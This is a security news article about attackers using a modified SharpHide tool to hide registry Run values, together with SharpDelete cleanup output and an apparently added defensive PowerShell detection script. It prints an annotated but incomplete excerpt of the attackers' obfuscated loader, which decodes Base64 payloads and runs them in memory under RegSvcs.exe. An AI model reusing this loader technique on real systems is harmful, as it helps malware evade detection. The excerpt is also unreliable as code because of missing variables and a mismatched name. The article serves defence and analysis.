Threat Actors Leveraging Modified Version of SharpHide Tool To Create Hidden Registry


Threat actors have been utilizing a modified version of the SharpHide tool to create hidden registry values, significantly complicating detection and deletion efforts.

This technique exploits Windows registry redirection, making it challenging for standard tools to identify and remove these stealthy persistence mechanisms.

SharpHide is a tool that leverages a technique documented by eWhiteHats researchers, which involves creating hidden registry keys by prepending two wide-character (wchar) nulls to the registry path.

SharpHide Detection (Source – Medium)

Andrew Petrus, a threat analyst at Sophos, noted that this method effectively hides the entries from the Registry Editor, which cannot handle null characters properly.

Modified SharpHide for Stealthy Persistence

The modified version of SharpHide has been integrated into a PowerShell script, which obfuscates two Base64-encoded binaries.

The first binary contains the malicious payload, while the second acts as a loader responsible for executing it.

The loader abuses PowerShell’s reflection capabilities to dynamically load and invoke a method that launches the payload under the RegSvcs.exe process.

PowerShell script (Source – Medium)

This technique helps evade detection by running the malware within a legitimate system executable.

$FFSSAA="FGHJTZXCV".replace('FGHJ','').replace('ZXC','')   # yields "TV", the first characters of a Base64-encoded PE ("TVqQAAMAAA..." is the MZ header)
$JOYR="qQ!!M!!!!E!!!!//8!!Lg!!!!!!!!!Q!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!g!!!!!".replace('!', 'A')   # '!' stands in for 'A' so the MZ header does not match simple Base64 signatures
$POOI=$FFSSAA+$iy            # first blob: the payload ($iy holds the bulk of the Base64 data, which the article's excerpt does not show)
$JHFSA =@($POOI)
$POOI2=$FFSSAA+$JOYR+$OE     # second blob: the loader ($OE likewise not shown)
$LKPL =@($POOI2)
$MNHL=[system.Convert].GetMethod("FromBase64String")   # resolve Convert.FromBase64String via reflection rather than calling it by name
$hgh=$MNHL.Invoke($null,$JHFSA)      # decoded payload bytes
$hgh2=$MNHL.Invoke($null,$LKPL)      # decoded loader bytes
$GGTI= 'C:\Windows\MiAAcroAAsoft.NEZZT\FraZZmewZZork\v4.0.30319\RegSvcs.exe'   # host process path padded with 'AA'/'ZZ' junk
$YOO=[object[]] ($GGTI.replace('AA','').replace('ZZ',''),$hgh)   # loader arguments: cleaned RegSvcs.exe path and payload bytes
[Reflection.Assembly]::Load($hgh2).GetType('YES').GetMethod('KISS').Invoke($null,$YO0)   # load the loader in memory and call YES.KISS(path, payload)
Set-Clipboard -Value "
exit;

When executed with administrator privileges, the malicious script creates hidden values within the WOW6432Node branch instead of the standard SOFTWARE branch.

This discrepancy is due to registry redirection, where Windows automatically redirects registry writes from 32-bit processes to the WOW6432Node branch on 64-bit systems.

This makes the hidden values invisible to the standard SharpHide deletion technique, which does not account for the redirected path.

To counter this issue, a new tool named SharpDelete has been developed. SharpDelete is designed to remove hidden registry values used for persistence, handling both standard and redirected registry paths.

SharpDelete (Source – Medium)

It allows users to specify custom registry locations, ensuring greater flexibility in detecting and removing stealthy persistence mechanisms.

[+] SharpDelete by Andrew Petrus - Tool to delete hidden registry values created by SharpHide
Select a registry path to remove the hidden value:
1. HKCU\Software\Microsoft\Windows\CurrentVersion\Run
2. HKLM\Software\Microsoft\Windows\CurrentVersion\Run (Administrator privileges required)
3. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run (Administrator privileges required)
4. Enter a custom registry path (Administrator privileges required for HKLM and most HKCR paths)
Enter your choice: 3
[+] Deleting hidden registry key in HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
[+] Key successfully deleted.

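A defender-side check for the hidden values described above, added here as an example and not code from the article or from the SharpHide/SharpDelete projects: it enumerates the Run keys with the native NtEnumerateValueKey call, whose length-prefixed UNICODE_STRING names survive the leading nulls that truncate RegEnumValue-based tools such as the Registry Editor, and it scans both the 64-bit view and the WOW6432Node view to cover the redirection. The function name Find-HiddenRunValues is my own; the struct offsets assume KeyValueBasicInformation (information class 0).

```powershell
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class NtReg {
    [DllImport("ntdll.dll")]
    public static extern uint NtEnumerateValueKey(IntPtr KeyHandle, uint Index,
        int InfoClass, IntPtr Info, uint Length, out uint ResultLength);
}
"@
function Find-HiddenRunValues {
    param([string]$SubKey = 'Software\Microsoft\Windows\CurrentVersion\Run')
    # Registry32 on a 64-bit host maps HKLM\Software to WOW6432Node, the branch
    # the article's script lands in; HKCU\...\Run is not redirected, so one view.
    $targets = @(
        @{ Hive = 'LocalMachine'; View = 'Registry64' },
        @{ Hive = 'LocalMachine'; View = 'Registry32' },
        @{ Hive = 'CurrentUser';  View = 'Registry64' }
    )
    $findings = @()
    $buf = [Runtime.InteropServices.Marshal]::AllocHGlobal(65536)
    try {
        foreach ($t in $targets) {
            $base = [Microsoft.Win32.RegistryKey]::OpenBaseKey($t.Hive, $t.View)
            $key = $base.OpenSubKey($SubKey)
            if (-not $key) { continue }
            $h = $key.Handle.DangerousGetHandle()   # an HKEY is a kernel handle; Nt* APIs accept it
            for ($i = 0; ; $i++) {
                $len = [uint32]0
                # class 0 = KeyValueBasicInformation: TitleIndex, Type, NameLength, Name[]
                $status = [NtReg]::NtEnumerateValueKey($h, $i, 0, $buf, 65536, [ref]$len)
                if ($status -eq 0x8000001A) { break }   # STATUS_NO_MORE_ENTRIES
                if ($status -ne 0) { throw ('NtEnumerateValueKey failed: 0x{0:X8}' -f $status) }
                # NameLength is the byte count of the full UNICODE_STRING, nulls included
                $nameBytes = [Runtime.InteropServices.Marshal]::ReadInt32($buf, 8)
                $name = [Runtime.InteropServices.Marshal]::PtrToStringUni(
                    [IntPtr]::Add($buf, 12), [int]($nameBytes / 2))
                if ($name.IndexOf([char]0) -ge 0) {
                    $findings += [pscustomobject]@{
                        Hive = $t.Hive; View = $t.View; Path = $SubKey
                        Name = $name.Replace("`0", '\0')   # render the hidden nulls visibly
                    }
                }
            }
            $key.Close(); $base.Close()
        }
    } finally { [Runtime.InteropServices.Marshal]::FreeHGlobal($buf) }
    return $findings
}
Find-HiddenRunValues | Format-Table -AutoSize
```

Reading HKLM\...\Run needs no elevation, so the check runs as a normal user; a hit in the Registry32 view of LocalMachine is the redirected WOW6432Node case the article describes.
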
These methods exploit vulnerabilities in how Windows handles registry entries, making detection and removal challenging.

Tools like SharpDelete offer solutions to these issues, showing the importance of continuous innovation in cybersecurity to combat emerging threats.
